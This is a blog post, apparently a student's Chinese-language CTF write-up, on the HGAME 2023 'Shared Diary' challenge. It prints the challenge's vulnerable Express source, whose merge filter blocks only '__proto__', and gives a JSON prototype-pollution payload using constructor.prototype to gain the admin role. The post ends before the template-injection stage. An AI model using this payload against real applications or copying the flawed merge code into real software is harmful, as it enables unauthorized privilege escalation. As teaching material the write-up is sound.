<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>phototype_1 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="原型链污染的概念了解的差不多了，但是具体而言还不太会用，找道例题看下具体如何使用 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475const express &#x3D; re">
<meta property="og:type" content="article">
<meta property="og:title" content="phototype_1">
<meta property="og:url" content="http://example.com/2024/03/04/phototype-1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="原型链污染的概念了解的差不多了，但是具体而言还不太会用，找道例题看下具体如何使用 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475const express &#x3D; re">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/">
<meta property="article:published_time" content="2024-03-04T15:54:20.000Z">
<meta property="article:modified_time" content="2024-03-04T15:54:48.844Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-phototype-1" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/03/04/phototype-1/" class="article-date">
  <time class="dt-published" datetime="2024-03-04T15:54:20.000Z" itemprop="datePublished">2024-03-04</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      phototype_1
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p>原型链污染的概念了解的差不多了，但是具体而言还不太会用，找道例题看下具体如何使用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line">const express = require(&#x27;express&#x27;);</span><br><span class="line">const bodyParser = require(&#x27;body-parser&#x27;);</span><br><span class="line">const session = require(&#x27;express-session&#x27;);</span><br><span class="line">const randomize = require(&#x27;randomatic&#x27;);</span><br><span class="line">const ejs = require(&#x27;ejs&#x27;);</span><br><span class="line">const path = require(&#x27;path&#x27;);</span><br><span class="line">const app = express();</span><br><span class="line"></span><br><span class="line">function merge(target, source) &#123;</span><br><span class="line">    for (let key in source) &#123;</span><br><span class="line">        // Prevent prototype pollution</span><br><span class="line">        if (key === &#x27;__proto__&#x27;) &#123;</span><br><span class="line">            throw new Error(&quot;Detected Prototype Pollution&quot;)</span><br><span class="line">        &#125;</span><br><span class="line">        if (key in source &amp;&amp; key in target) &#123;</span><br><span class="line">            merge(target[key], source[key])</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            target[key] = source[key]</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">app</span><br><span class="line">    .use(bodyParser.urlencoded(&#123;extended: true&#125;))</span><br><span class="line">    .use(bodyParser.json());</span><br><span class="line">app.set(&#x27;views&#x27;, path.join(__dirname, &quot;./views&quot;));</span><br><span class="line">app.set(&#x27;view engine&#x27;, &#x27;ejs&#x27;);</span><br><span class="line">app.use(session(&#123;</span><br><span class="line">    name: &#x27;session&#x27;,</span><br><span class="line">    secret: randomize(&#x27;aA0&#x27;, 16),</span><br><span class="line">    resave: false,</span><br><span class="line">    saveUninitialized: false</span><br><span class="line">&#125;))</span><br><span class="line"></span><br><span class="line">app.all(&quot;/login&quot;, (req, res) =&gt; &#123;</span><br><span class="line">    if (req.method == &#x27;POST&#x27;) &#123;</span><br><span class="line">        // save userinfo to session</span><br><span class="line">        let data = &#123;&#125;;</span><br><span class="line">        try &#123;</span><br><span class="line">            merge(data, req.body)</span><br><span class="line">        &#125; catch (e) &#123;</span><br><span class="line">            return res.render(&quot;login&quot;, &#123;message: &quot;Don&#x27;t pollution my shared diary!&quot;&#125;)</span><br><span class="line">        &#125;</span><br><span class="line">        req.session.data = data</span><br><span class="line"></span><br><span class="line">        // check password</span><br><span class="line">        let user = &#123;&#125;;</span><br><span class="line">        user.password = req.body.password;</span><br><span class="line">        if (user.password=== &quot;testpassword&quot;) &#123;</span><br><span class="line">            user.role = &#x27;admin&#x27;</span><br><span class="line">        &#125;</span><br><span class="line">        if (user.role === &#x27;admin&#x27;) &#123;</span><br><span class="line">            req.session.role = &#x27;admin&#x27;</span><br><span class="line">            return res.redirect(&#x27;/&#x27;)</span><br><span class="line">        &#125;else &#123;</span><br><span class="line">            return res.render(&quot;login&quot;, &#123;message: &quot;Login as admin or don&#x27;t touch my shared diary!&quot;&#125;)</span><br><span class="line">        &#125; </span><br><span class="line">    &#125;</span><br><span class="line">    res.render(&#x27;login&#x27;, &#123;message: &quot;&quot;&#125;);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.all(&#x27;/&#x27;, (req, res) =&gt; &#123;</span><br><span class="line">    if (!req.session.data || !req.session.data.username || req.session.role !== &#x27;admin&#x27;) &#123;</span><br><span class="line">        return res.redirect(&quot;/login&quot;)</span><br><span class="line">    &#125;</span><br><span class="line">    if (req.method == &#x27;POST&#x27;) &#123;</span><br><span class="line">        let diary = ejs.render(`&lt;div&gt;$&#123;req.body.diary&#125;&lt;/div&gt;`)</span><br><span class="line">        req.session.diary = diary</span><br><span class="line">        return res.render(&#x27;diary&#x27;, &#123;diary: req.session.diary, username: req.session.data.username&#125;);</span><br><span class="line">    &#125;</span><br><span class="line">    return res.render(&#x27;diary&#x27;, &#123;diary: req.session.diary, username: req.session.data.username&#125;);</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app.listen(8888, &#x27;0.0.0.0&#x27;);</span><br></pre></td></tr></table></figure>

<p>这道题是 [HGAME 2023 week4]Shared Diary ，自带源码，登入网站后是用户名，密码输入（虽然没见过几道题，但好像见到的每个污染都是这么个界面）</p>
<p>既然知道是原型链污染题型，直接找源代码里面漏洞易发现的merge（）部分</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">function merge(target, source) &#123;</span><br><span class="line">    for (let key in source) &#123;</span><br><span class="line">        // Prevent prototype pollution</span><br><span class="line">        if (key === &#x27;__proto__&#x27;) &#123;</span><br><span class="line">            throw new Error(&quot;Detected Prototype Pollution&quot;)</span><br><span class="line">        &#125;</span><br><span class="line">        if (key in source &amp;&amp; key in target) &#123;</span><br><span class="line">            merge(target[key], source[key])</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            target[key] = source[key]</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到把’<strong>ptoto</strong>‘ban掉了，但是存在平替prototype，constructor</p>
<p>看后面部分：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> if (user.password=== &quot;testpassword&quot;) &#123;</span><br><span class="line">            user.role = &#x27;admin&#x27;</span><br><span class="line">        &#125;</span><br><span class="line">        if (user.role === &#x27;admin&#x27;) &#123;</span><br><span class="line">            req.session.role = &#x27;admin&#x27;</span><br><span class="line">            return res.redirect(&#x27;/&#x27;)</span><br><span class="line">        &#125;else &#123;</span><br><span class="line">            return res.render(&quot;login&quot;, &#123;message: &quot;Login as admin or don&#x27;t touch my shared diary!&quot;&#125;)</span><br><span class="line">        &#125; </span><br><span class="line">    &#125;</span><br><span class="line">    res.render(&#x27;login&#x27;, &#123;message: &quot;&quot;&#125;);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>我们需要让user.role&#x3D;&#x3D;&#x3D;admin</p>
<p>直接抓包替换payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;constructor&quot;: &#123;&quot;prototype&quot;: &#123;&quot;role&quot;: &quot;admin&quot;&#125;&#125;,&quot;username&quot;:&quot;admin&quot;,&quot;password&quot;:&quot;admin&quot;&#125; </span><br></pre></td></tr></table></figure>

<p>记得把读取格式改成json</p>
<p>然后就到第二部分了，这个部分还没了解过，未完待续</p>
<p><img src="/" alt="/images/6.png"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/03/04/phototype-1/" data-id="clth90jg000001wb5aaol91o1" data-title="phototype_1" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/03/05/%E5%8E%9F%E7%94%9F%E7%B1%BB/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          原生类
        
      </div>
    </a>
  
  
    <a href="/2024/03/03/phototype/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">phototype</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/html-css-js%E5%9F%BA%E7%A1%80%E5%AD%A6%E4%B9%A0/" rel="tag">html, css, js基础学习</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/html-css-js%E5%9F%BA%E7%A1%80%E5%AD%A6%E4%B9%A0/" style="font-size: 10px;">html, css, js基础学习</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/03/">March 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/02/">February 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/01/">January 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/03/07/ssrf/">ssrf</a>
          </li>
        
          <li>
            <a href="/2024/03/05/%E5%8E%9F%E7%94%9F%E7%B1%BB/">原生类</a>
          </li>
        
          <li>
            <a href="/2024/03/04/phototype-1/">phototype_1</a>
          </li>
        
          <li>
            <a href="/2024/03/03/phototype/">phototype</a>
          </li>
        
          <li>
            <a href="/2024/03/03/n-ez-unserilize/">n_ez_unserilize</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>